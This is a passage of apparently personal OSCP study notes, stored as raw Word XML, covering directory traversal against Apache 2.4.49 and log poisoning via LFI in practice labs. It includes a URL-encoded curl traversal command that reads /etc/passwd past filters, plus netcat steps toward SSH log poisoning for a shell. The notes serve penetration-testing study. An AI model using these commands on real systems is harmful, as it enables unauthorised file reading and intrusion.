        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is important since in the Relia, the ../ were getting blocked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the OSCP 9.1.3. Encoding Special Characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Having honed our understanding of directory traversal concepts using the "Mountain Desserts" web application, let's try applying these skills to a real vulnerability. In the "Vulnerability Scanning" topic, we scanned the SAMBA machine and identified a directory traversal vulnerability in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache 2.4.49.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This vulnerability can be exploited by using a relative path after specifying the cgi-bin directory in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use curl and multiple ../ sequences to try exploiting this directory traversal vulnerability in Apache 2.4.49 on the WEB18 machine.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3860800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="168" name="image204.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image204.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 11 demonstrates that after attempting two queries with a different number of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we could not display the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via directory traversal. Because leveraging </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a known way to abuse web application behavior, this sequence is often filtered by either the web server,</w:t>
      </w:r>
      <w:hyperlink r:id="rId571">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId572">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">web application firewalls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or the web application itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fortunately for us, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId573">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId574">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL Encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, also called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Percent Encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to potentially bypass these filters. We can leverage specific</w:t>
      </w:r>
      <w:hyperlink r:id="rId575">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId576">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ASCII encoding lists</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manually encode our query from listing 11 or use the online converter on the same page. For now, we will only encode the dots, which are represented as "%2e".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="529" name="image507.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image507.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57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CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="935"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/etc/passwd</w:t>
      </w:r>
    </w:p>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully used directory traversal with encoded dots to display the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally, URL encoding is used to convert characters of a web request into a format that can be transmitted over the internet. However, it is also a popular method used for malicious purposes. The reason for this is that the encoded representation of characters in a request may be missed by filters, which only check for the plain-text representation of them e.g. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but not </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After the request passes the filter, the web application or server interprets the encoded characters as a valid request.</w:t>
      </w:r>
    </w:p>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dr61fk3r1e6z" w:id="240"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Poisoning via LFI</w:t>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t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId578">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we got LFI and then we used Log Poisoning to get foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: The auth.log file on Linux systems records authentication-related events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents: It includes information about login attempts, both successful and failed, as well as activities related to authentication mechanisms (e.g., sudo usage).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: Commonly found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on Debian-based systems) or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/secure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(on Red Hat-based systems).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: Used by administrators to monitor and investigate authentication issues, detect unauthorized access attempts, and ensure system security.</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: The access.log file records all requests made to a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents: It contains details such as the client's IP address, request method (GET, POST, etc.), requested URL, HTTP status code, and user agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: Typically found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Apache or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/nginx/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: Used by web administrators to analyze traffic, monitor server activity, troubleshoot issues, and enhance security by detecting unusual access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poisoning the logs can give you a shell on the system depending on the language used on the backend in this case I saw that PHP was being used by checking out my Wappalyzer browser extension which is a great tool for web engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9nockyiwfpd9" w:id="241"/>
      <w:bookmarkEnd w:id="241"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried accessing the access.log file and had no luck so I moved on to auth.log and was able to view its contents this means we are going to go with SSH log-poisoning techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2768600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="343" name="image351.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image351.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57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CD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I chased my tail around for a while to get a working exploit because some of the methods used for this are outdated. I connected to the port using Netcat and injected a PHP command.</w:t>
      </w:r>
    </w:p>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rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nc -nv 192.168.167.80 22</w:t>
      </w:r>
    </w:p>
